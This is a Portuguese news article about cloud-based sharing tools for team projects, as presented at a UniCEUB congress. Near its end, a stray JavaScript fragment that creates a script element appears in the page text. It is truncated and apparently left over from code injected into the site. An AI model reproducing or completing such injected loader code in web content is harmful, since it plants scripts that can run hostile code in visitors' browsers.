Ferramentas de compartilhamentos ajudam projetos em equipe, dizem especialistas

O uso de ferramentas de compartilhamento disponíveis em nuvem tem ajudado no gerenciamento de informações e pessoas, segundo avalia a jornalista Andrea Lopes, que é pesquisadora da área e trabalha com projetos ligados a redes sociais. A palestrante esteve no XIV Congresso de Ensino, Pesquisa e Extensão realizado no UniCEUB.

00-comp

Os softwares de compartilhamento permitem recursos como processamento e armazenamento virtualizados e são liberados para uso em rede de colaboradores. “Isso permite agir localmente interagindo globalmente”, destacou a jornalista. Segundo o professor Mauro Castro, coordenador de Pós–Graduação em Administração no UniCEUB, que foi moderador dos debates, para que se aproveite o potencial dos recursos tecnológicos tanto nos negócios quanto na educação é preciso considerar o tripé: Nuvem – Hardware – Mobile.

Segundo ele, isso pressupõe o uso de um dispositivo como computador, tablete ou celular, por exemplo; o acesso a softwares disponíveis no modelo de computação na nuvem e um dispositivo que permita mobilidade. Esse conjunto facilita que as pessoas se comuniquem a qualquer tempo em qualquer lugar.

Os palestrantes apontaram que, apesar de muitas pessoas ainda resistirem ao uso da tecnologia e da qualidade da internet disponível no Brasil, essa forma de trabalho ganha cada vez mais adeptos pela facilidade de interação entre as pessoas e o compartilhamento de informações. Para que tudo funcione bem, cabe ao líder de projeto integrar as informações relevantes ao trabalho quando é utilizado mais de um recurso como WhatsApp, Dropbox, OneDrive (antigo SkyDrive), Google Drivedentre outros.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário